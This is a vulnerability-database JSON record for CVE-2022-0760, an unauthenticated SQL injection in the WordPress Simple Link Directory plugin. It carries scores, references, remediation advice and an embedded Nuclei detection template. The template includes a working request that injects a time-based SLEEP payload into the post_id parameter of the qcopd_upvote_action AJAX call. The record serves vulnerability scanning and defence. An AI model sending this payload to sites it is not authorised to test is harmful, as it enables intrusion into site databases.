{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2022-0760/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2022-0760/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2022-0760/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2022-0760/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2022-0760/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2022-0760"},"sightings":{"href":"/api/v1/sightings/cve-2022-0760"}},"enrichments":{"cisa-kev":{"kev":false},"epss":{"epss":0.10825,"kev":false,"percentile":0.95654},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2022/CVE-2022-0760.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2022-0760\n\ninfo:\n  name: WordPress Simple Link Directory <7.7.2 - SQL injection\n  author: theamanrawat\n  severity: critical\n  description: |\n    WordPress Simple Link Directory plugin before 7.7.2 contains a SQL injection vulnerability. The plugin does not validate and escape the post_id parameter before using it in a SQL statement via the qcopd_upvote_action AJAX action, available to unauthenticated and authenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n  impact: |\n    Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the WordPress site.\n  remediation: |\n    Update to the latest version of WordPress Simple Link Directory plugin (7.7.2 or higher) to mitigate the SQL injection vulnerability.\n  reference:\n    - https://wpscan.com/vulnerability/1c83ed73-ef02-45c0-a9ab-68a3468d2210\n    - https://wordpress.org/plugins/simple-link-directory/\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-0760\n    - https://plugins.trac.wordpress.org/changeset/2684915\n    - https://github.com/ARPSyndicate/cvemon\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2022-0760\n    cwe-id: CWE-89\n    epss-score: 0.10825\n    epss-percentile: 0.95654\n    cpe: cpe:2.3:a:quantumcloud:simple_link_directory:*:*:*:*:*:wordpress:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: quantumcloud\n    product: simple_link_directory\n    framework: wordpress\n  tags: time-based-sqli,cve,cve2022,sqli,wordpress,wp-plugin,wp,simple-link-directory,unauth,wpscan,quantumcloud,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        @timeout 20s\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=qcopd_upvote_action&post_id=(SELECT 3 FROM (SELECT SLEEP(7))enz)\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'duration>=7'\n          - 'status_code == 200 || status_code == 500'\n          - 'contains(content_type, \"text/html\")'\n          - 'contains(body, \"vote_status\") || contains(body, \"critical error\")'\n        condition: and\n# digest: 490a00463044022034c5673604ac553cb02d3017c7d8b589012c090720cbb7b4b48b9c9a22ac1a480220356d131c2e976f34b0598ec4da93fe8d845cdfecaef40b9c3b029fc3753545f7:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2022-0760"}